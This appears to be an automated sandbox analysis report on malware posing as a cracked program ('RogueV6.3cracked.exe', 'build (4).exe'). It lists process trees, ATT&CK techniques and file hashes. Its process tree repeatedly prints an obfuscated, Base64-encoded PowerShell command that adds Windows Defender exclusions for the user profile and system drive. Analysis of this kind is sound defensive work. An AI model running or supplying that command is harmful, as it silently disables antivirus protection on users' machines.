        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        299⤵
        
        PID:9672
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        299⤵
        
        PID:9988
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        299⤵
        
        PID:8668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        300⤵
        
        PID:10260
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        300⤵
        
        PID:10292
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        300⤵
        
        PID:10324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        301⤵
        
        PID:10360
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        301⤵
        
        PID:10400
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        301⤵
        
        PID:10436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        302⤵
        
        PID:10548
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        302⤵
        
        PID:10576
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        302⤵
        
        PID:10592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        303⤵
        
        PID:10636
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        303⤵
        
        PID:10676
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        303⤵
        
        PID:10700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        304⤵
        
        PID:10808
        
        C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "10808" "920"
        305⤵
        
        PID:11096
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        304⤵
        
        PID:10844
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        304⤵
        
        PID:10872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        305⤵
        
        PID:10932
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        305⤵
        
        PID:10952
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        305⤵
        
        PID:10976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        306⤵
        
        PID:11032
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        306⤵
        
        PID:11064
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10976 -s 260
        306⤵
        Program crash
        
        PID:11084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-10144209231234083538-1107516154-1748162162-975234983-357098663-18696389411870984079"
1⤵
PID:2504

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1735270382-663295187-568361224-20091879595426953711672122402-203605604780513754"
1⤵
PID:2404

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-731079442-1726998122-2120586651863548473-1763244871-15446369111506497088-547091375"
1⤵
PID:948

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "184443766491460142-1702760674-1118678842406460023-1677727451-1604896423-425038654"
1⤵
PID:2692

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1939803011-79447836112610488551785890444-587239234-696134119-787982578-1050532011"
1⤵
PID:760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "720568160-1691767208-28164744993924419105566806-1591840877659102903-1997507167"
1⤵
PID:1656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1427108913404611506212115253-18578791251684609951817997467-1965314645159443377"
1⤵
PID:3636

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15459172251102081459-1426270130888094118-1513739648-3587973031574684276204024335"
1⤵
PID:3204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1076280702-106316108313768370981645904518-1275616067-10772677561499847281063856063"
1⤵
PID:2112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2022302597-827390732-1622031115213964272979372376180019243921373017812741945"
1⤵
PID:3684

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20829340162617230841067982715832509594-1849143307-5242211491880248085-432124175"
1⤵
PID:1912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-904802672-2073265832-284239326-1448567592-171615874835151923949341021-24240595"
1⤵
PID:3648

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2381045116077984521396575291405558476-3350908651935688231852227296-465419231"
1⤵
PID:3516

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1812247709-38162445138990586-1950356853-1886318747133805853116419045332108816160"
1⤵
PID:3744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IHB8M1ECY6R6SQMQIHHV.temp

Filesize
7KB

MD5
c0f6672b416ce73265a8ab97bae67c32

SHA1
f516574c106e63e00bccd1e6deb4922962f5d10f

SHA256
6b3e73d1ee82819cd890d7377c384755971e7883b2a85a43193129e8aeea0ed3

SHA512
19c39d642af912f8804260c45e083da1c43de17478915c515d5aeab6c372d6db21b3502718205b9ade8b103dee4eead807065deeaa395cc10a7c221a7dce76d1

Download Submit
\Users\Admin\AppData\Local\Temp\build (4).exe

Filesize
300KB

MD5
79facd71cdf8744babe699eb633ee749

SHA1
985abf9a05fdd5ee477d61d56278332947150b75

SHA256
21d14de29ee8965a01a805ae72051b4039de6697f20fe85bd61d878a425cf22d

SHA512
453f6a66f8fc99a08cca69f5c3fe392b36510ce8e700a5b568f9cd03f785d4d674a00525142dc698baf9a182cb58848f126273554ecee71416c0ee5b8b714222

Download Submit
memory/1952-8-0x00000000008A0000-0x00000000008F2000-memory.dmp

Filesize
328KB

Download